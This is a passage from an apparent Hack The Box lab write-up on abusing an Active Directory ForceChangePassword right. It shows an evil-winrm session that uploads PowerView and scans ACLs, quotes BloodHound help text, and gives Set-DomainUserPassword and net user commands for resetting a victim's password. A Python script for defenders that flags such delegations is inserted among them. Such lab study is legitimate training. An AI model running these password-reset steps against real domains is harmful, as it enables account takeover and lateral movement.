ForceChangePassword


Proceeding with the attack vector identified during the BloodHound enumeration: the oliver user has the ForceChangePassword privilege over the smith user.

*evil-winrm* ps c:\tmp> upload PowerView.ps1 C:\tmp\
info: Uploading /home/kali/archive/htb/labs/object/PowerView.ps1 to C:\tmp\
data: 1027036 bytes of 1027036 bytes copied
info: Upload successful!
 
*evil-winrm* ps c:\tmp> . .\PowerView.ps1

I will first upload PowerView and import the script into the current PowerShell session.

*evil-winrm* ps c:\tmp> Invoke-ACLScanner -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -eq "oliver"}
objectdn                : CN=Smith William,CN=Users,DC=object,DC=local
acequalifier            : AccessAllowed
activedirectoryrights   : ExtendedRight
objectacetype           : User-Force-Change-Password
aceflags                : None
acetype                 : AccessAllowedObject
inheritanceflags        : None
securityidentifier      : S-1-5-21-4088429403-1159899800-2753317549-1103
identityreferencename   : oliver
identityreferencedomain : object.local
identityreferencedn     : CN=Olivar Ava,CN=Users,DC=object,DC=local
identityreferenceclass  : user

Using PowerView's Invoke-ACLScanner, I can list the ACL of the oliver user as shown above: the oliver user has the User-Force-Change-Password ACE over the AD object CN=Smith William,CN=Users,DC=object,DC=local.
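As an added defender-side check (not part of this write-up or of PowerView), the following Python script parses Invoke-ACLScanner list output like the block above and flags User-Force-Change-Password ACEs whose holder is not in an assumed allow-list of administrative groups; the sample input is constructed from the output above plus one benign record.

```python
import re

# Constructed sample: the ACE from the write-up plus one benign record held
# by a built-in group (assumed), so the filter has something to keep and drop.
SAMPLE = """
objectdn                : CN=Smith William,CN=Users,DC=object,DC=local
activedirectoryrights   : ExtendedRight
objectacetype           : User-Force-Change-Password
identityreferencename   : oliver
identityreferencedomain : object.local
identityreferenceclass  : user

objectdn                : CN=Smith William,CN=Users,DC=object,DC=local
activedirectoryrights   : ExtendedRight
objectacetype           : User-Force-Change-Password
identityreferencename   : Domain Admins
identityreferencedomain : object.local
identityreferenceclass  : group
"""

# Principals expected to hold password-reset rights (assumption for the
# example; tune to the environment's delegation model).
EXPECTED_HOLDERS = {"domain admins", "enterprise admins", "account operators"}


def parse_records(text):
    """Split Format-List style output into one dict per blank-line-separated block."""
    records, current = [], {}
    for line in text.splitlines():
        m = re.match(r"^(\w+)\s*:\s*(.*)$", line)
        if m:
            current[m.group(1).lower()] = m.group(2).strip()
        elif current:  # a blank line ends the current record
            records.append(current)
            current = {}
    if current:
        records.append(current)
    return records


def unexpected_reset_rights(text):
    """Return (holder, target DN) for reset-password ACEs held outside the allow-list."""
    findings = []
    for rec in parse_records(text):
        if rec.get("objectacetype") != "User-Force-Change-Password":
            continue
        holder = rec.get("identityreferencename", "")
        if holder.lower() not in EXPECTED_HOLDERS:
            findings.append((holder, rec.get("objectdn", "")))
    return findings
```

Feeding it the full `Invoke-ACLScanner -ResolveGUIDs | Format-List` output of a domain gives a quick list of user-to-user password-reset delegations worth reviewing.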

BloodHound


The following is from the Help section of BloodHound:

There are at least two ways to execute this attack. The first and most obvious is by using the built-in net.exe binary in Windows (e.g.: net user dfm.a Password123! /domain). See the opsec considerations tab for why this may be a bad idea. The second, and highly recommended method, is by using the Set-DomainUserPassword function in PowerView. This function is superior to using the net.exe binary in several ways. For instance, you can supply alternate credentials, instead of needing to run a process as or logon as the user with the ForceChangePassword privilege. Additionally, you have much safer execution options than you do with spawning net.exe (see the opsec tab).

Example


To abuse this privilege with PowerView's Set-DomainUserPassword, first import PowerView into your agent session or into a PowerShell instance at the console. You may need to authenticate to the Domain Controller as [[object_bloodhound#object_forcechangepassword|oliver@object.local]] (reference: [ForceChangePassword](https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword)) if you are not running a process as that user. To do this in conjunction with Set-DomainUserPassword, first create a PSCredential object (these examples come from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Then create a secure string object for the password you want to set on the target user:

$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

Finally, use Set-DomainUserPassword, optionally specifying $Cred if you are not already running a process as [[object_bloodhound#object_forcechangepassword|oliver@object.local]]:

Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred

Now that you know the target user’s plain text password, you can either start a new agent as that user, or use that user’s credentials in conjunction with PowerView’s ACL abuse functions, or perhaps even RDP to a system the target user has access to. For more ideas and information, see the references tab.

Moving on to the [[Object_Lateral_Movement_smith|Lateral Movement]] phase.